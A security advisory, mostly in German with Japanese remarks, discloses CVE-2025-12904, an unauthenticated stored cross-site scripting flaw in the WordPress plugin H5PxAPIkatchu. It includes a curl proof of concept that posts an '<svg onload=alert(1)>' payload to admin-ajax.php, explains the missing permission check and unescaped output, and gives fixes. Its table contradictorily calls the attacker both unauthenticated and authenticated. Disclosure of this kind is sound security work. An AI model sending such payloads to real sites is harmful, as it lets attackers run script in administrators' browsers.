
Offenlegung für CVE-2025-12904
Offenlegung für CVE-2025-12904
Dieses Repository legt eine Sicherheitslücke offen, die in SNORDIAN's H5PxAPIkatchu <= 0.4.16, einem von otacke entwickelten WordPress-Plugin, entdeckt wurde.
| CVE ID | Type | Component | Impact |
|---|---|---|---|
| CVE-2025-12904 | Unauthenticated Stored Cross-Site Scripting via insert_data | class-table-view.php | Authenticated attacker can execute JS |
curl -i -X POST 'http://localhost:8080/wp-admin/admin-ajax.php' \
--data-urlencode 'action=insert_data' \
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
※Wenn die ID im Objekt nicht existiert, schlägt es fehl.
Die insert_data()-Funktion führte keine Berechtigungsprüfungen durch, sodass bösartige Eingaben ohne Authentifizierung gespeichert werden konnten. Darüber hinaus wurden diese Einträge unescaped auf der Administrationsoberfläche angezeigt.
insert_data()-Funktion verwendet current_user_can, um unbefugte Ausführung zu verhindern.esc_html($value) anstelle von echo $value kann die Ausführung von XSS verhindert werden.PoCを作成するのがとても大変だった。
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
この部分の再現にとても時間を使ってしまった。curlコマンドをもっと使いこなせるようになりたい。 あとこのプラグイン...色々と大丈夫?とくに、名前とか、さ。
Name: MooseLove
Rolle: Unabhängiger Sicherheitsforscher / Bug Hunter
Kontakt: Auf Anfrage erhältlich
Dieses Advisory wird zu Zwecken des öffentlichen Sicherheitsbewusstseins bereitgestellt. Freie Weitergabe mit Namensnennung erlaubt.